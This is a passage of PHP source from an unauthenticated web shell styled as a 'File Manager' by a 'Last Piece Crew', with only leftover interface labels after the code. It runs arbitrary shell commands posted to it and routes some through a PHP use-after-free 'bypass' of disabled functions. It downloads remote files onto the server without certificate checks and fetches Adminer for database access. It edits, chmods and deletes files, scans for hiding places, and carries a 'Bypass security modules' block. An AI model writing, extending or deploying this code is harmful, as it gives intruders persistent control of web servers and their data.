(isset($_POST['remote_upload']) && !empty($_POST['remote_url'])) { $url = $_POST['remote_url']; $fname = !empty($_POST['remote_filename']) ? $_POST['remote_filename'] : basename(parse_url($url, PHP_URL_PATH)); $target = $currentDirectory . '/' . $fname; fixPermission($currentDirectory); $content = @file_get_contents($url); if ($content === false && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER=>true,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_TIMEOUT=>30,CURLOPT_SSL_VERIFYPEER=>false]); $content = curl_exec($ch); curl_close($ch); } if ($content !== false && @file_put_contents($target, $content) !== false) $responseMessage = "Remote file downloaded: $fname"; else $responseMessage = 'Failed to download remote file.'; } if (isset($_GET['edit'])) { $file = $_GET['edit']; $content = readFileContent($file); if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { if (saveFileContent($file)) $responseMessage = 'File saved.'; else $errorMessage = 'Error saving file.'; } } if (isset($_GET['chmod'])) { $file = $_GET['chmod']; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['permission'])) { $perm = intval($_POST['permission'], 8); if ($perm > 0 && @chmod($file, $perm)) $responseMessage = 'Permission changed.'; else $errorMessage = 'Error changing permission.'; } } if (isset($_POST['upload'])) { $responseMessage = uploadFile($currentDirectory); } if (isset($_POST['cmd']) && !empty($_POST['cmd'])) { $useBypass = isset($_POST['use_bypass']) && $_POST['use_bypass'] === '1'; if ($useBypass) { $bypassOut = runBypass($_POST['cmd']); $cmdOutput = $bypassOut ?: 'Bypass returned no output. UAF may not work on this PHP version.'; } else { $cmdOutput = executeCommand($_POST['cmd']); } } if (isset($_POST['eclipse']) && !empty($_POST['eclipse'])) { $bypassOut = runBypass($_POST['eclipse']); $cmdOutput = $bypassOut ?: 'Bypass returned no output. UAF may not work on this PHP version.'; } if (isset($_GET['rename']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_name'])) { $file = $_GET['rename']; $responseMessage = renameFile($file, $_POST['new_name']); } if (isset($_GET['del'])) { $file = $_GET['del']; $fileDir = dirname($file); if (deleteFile($file)) { header('Location: ?lph=' . urlencode($fileDir) . '&msg=deleted'); exit; } else { $errorMessage = 'Failed to delete: ' . basename($file); } } if (isset($_POST['Summon'])) { $url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php'; $filePath = $currentDirectory . '/Adminer.php'; $fileContent = @file_get_contents($url); if ($fileContent !== false && @file_put_contents($filePath, $fileContent) !== false) { $responseMessage = 'Adminer summoned successfully.'; } else { $errorMessage = 'Failed to summon Adminer.'; } } if (isset($_POST['scan_deeply'])) { $results = scanDeepestDirectory($currentDirectory); $cmdOutput = "=== Deepest Directories ===\n"; if (empty($results)) $cmdOutput .= "No subdirectories found."; else foreach ($results as $r) $cmdOutput .= $r . "\n"; } if (isset($_POST['scan_newly'])) { $ext = isset($_POST['scan_ext']) ? $_POST['scan_ext'] : 'php'; $results = scanNewlyFiles($currentDirectory, $ext); $cmdOutput = "=== Newest .$ext Files ===\n"; if (empty($results)) $cmdOutput .= "No files found."; else foreach ($results as $r) $cmdOutput .= date('Y-m-d H:i:s', $r['time']) . " | " . $r['path'] . "\n"; } if (isset($_GET['msg']) && $_GET['msg'] === 'deleted') { $responseMessage = 'Item deleted successfully.'; } // Bypass security modules if (function_exists('litespeed_request_headers')) { $headers = litespeed_request_headers(); if (isset($headers['X-LSCACHE'])) header('X-LSCACHE: off'); } ?> Last Piece Crew - File Manager
← Back

Editing:

Cancel

Rename:

Cancel

Chmod:

Cancel
Last Piece
File Manager v1.0
No Auth
DIR: $part) { if ($part == '' && $id == 0) { echo '/'; } elseif (!empty($part)) { $link = implode('/', array_slice($parts, 0, $id + 1)); echo '' . htmlspecialchars($part) . '/'; } } ?>
Features
Scanner
Tools
$
Exec: | Bypass: UAF PHP | Disabled: 60 ? '...' : '') : 'None'; ?>
Name Type Size Permission Actions
Edit Rename Chmod Delete
No files or folders found.